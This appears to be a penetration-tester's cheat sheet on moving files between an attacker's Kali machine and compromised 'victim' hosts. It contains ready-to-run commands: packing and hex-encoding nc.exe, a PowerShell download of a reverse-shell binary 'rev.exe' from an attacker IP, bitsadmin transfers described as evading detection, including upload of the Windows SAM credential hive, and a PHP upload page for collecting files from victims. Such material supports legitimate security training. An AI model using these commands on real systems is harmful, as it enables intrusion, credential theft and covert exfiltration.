File Transfer – Lisandre

Cheat sheet for transferring (downloading/uploading) files between machines.

Web server

FTP

wget

On Windows, C:\ProgramData is often writable.

Web server

Use updog, a replacement for SimpleHTTPServer that allows upload!

# Python 2.7
python -m SimpleHTTPServer 80

# Python 3.x
python3 -m http.server 80

sudo service apache2 start

Transfer binary files (convert to ascii)

Optional: Compress binary file

Use an executable packer (PE compression tool). The file is still executable after!

cd /home/kali/share
upx -9 nc.exe

Convert binary file to ascii

exe2hex -x nc.exe -p nc.cmd

Transfer the file using any other method.

Reconstruct the binary file

The last command is in Powershell and will reconstruct the binary file.

.\nc.cmd

FTP

pip install pyftpdlib

python -m pyftpdlib -p 21 -w

ftp anonymous@x.x.x.x

wget

Proxy configuration

nano /etc/wgetrc

http_proxy = http://127.0.0.1:3128
use_proxy = on

Download file in current directory

wget -O <local file name> <URL>
wget -O /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"

Download folder

wget -r "https://whatever/foldernameendingwithaslash/"

curl

curl -o <local file name> <URL>
curl -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"

axel

Download accelerator.

axel -a -n 20 -o <local file name> <URL>
axel -a -n 20 -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"

netcat

See Netcat.

Powershell

See Powershell Cheat Sheet for more examples.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/rev.exe','C:\ProgramData\rev.exe')"

scp (secure copy)

scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2

sudo service ssh start

Windows (victim) to Kali

scp -r "C:\path\file.txt" kali@x.x.x.x:/home/kali/

Linux (victim) to Kali

scp -r "/tmp/linpeas.txt" kali@x.x.x.x:/home/kali/

Background Intelligent Transfer Service (BITS) on Windows

BITS for Script Kiddies (TrustedSec)
Living Off the Land binaries (LOLBins) | Preventing LOL

Useful to evade detection since BITS is used for Windows Updates.

Download file

bitsadmin /create JOB & bitsadmin /addfile JOB <REMOTE_SRC> <LOCAL_DST> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB

bitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/nc.exe %TEMP%\Data\nc.exe & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB

Upload file

bitsadmin /create /upload JOB & bitsadmin /addfile JOB <REMOTE_DST> <LOCAL_SRC> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB

bitsadmin /create /upload JOB & bitsadmin /addfile JOB http://<KALI IP>/SAM %TEMP\Data\SAM & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB

Impacket

See Impacket.

Start SMB server on Kali Linux. See this post.
On the Windows machine, copy file from Kali

Supports binary file transfer. SEE ALSO impacket-wmiexec!!

On Kali

sudo impacket-smbserver myshare /home/kali/share

On Windows

net view \\<KALI IP>

dir \\<KALI IP>\<sharename>

copy <source> <destination>

copy <filename> \\<KALI IP>\<sharename>\<filename>

copy \\<KALI IP>\<sharename>\<filename> <filename>

PHP File Upload

On Kali, host a file upload page on Apache Web Server.

sudo mkdir /var/www/html/uploads
sudo chown www-data:www-data /var/www/html/uploads
sudo chmod 766 /var/www/html/uploads

sudo service apache2 start

upload.php

sudo nano /var/www/html/upload.php

<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["targetfile"]["name"]);
move_uploaded_file($_FILES["targetfile"]["tmp_name"], $target_file)
?>

upload.html

sudo nano /var/www/html/upload.html

<html>
<head></head>
<body>
<form action="./upload.php" method="POST" enctype="multipart/form-data">
File<br>
<input type="file" name="targetfile"><br>
<input type="submit" name="submit" value="upload">
</form>
</body>
</html>

On the victim

Open a web browser and go to http://<KALI_IP>/upload.html

powershell (New-Object System.Net.WebClient).UploadFile('http://x.x.x.x/upload.php', 'file.txt')

WinSCP

WinSCP (Windows Secure Copy) is a file manager, SSH File Transfer Protocol (SFTP), File Transfer Protocol (FTP), WebDAV, Amazon S3, and secure copy protocol (SCP) client for Microsoft Windows.

Download and install WinSCP.

Authentication with RSA private key

On the Login screen, click on Advanced.
Click on SSH->Authentication.
Select the private key file (Putty format, “.ppk” file).
Click OK.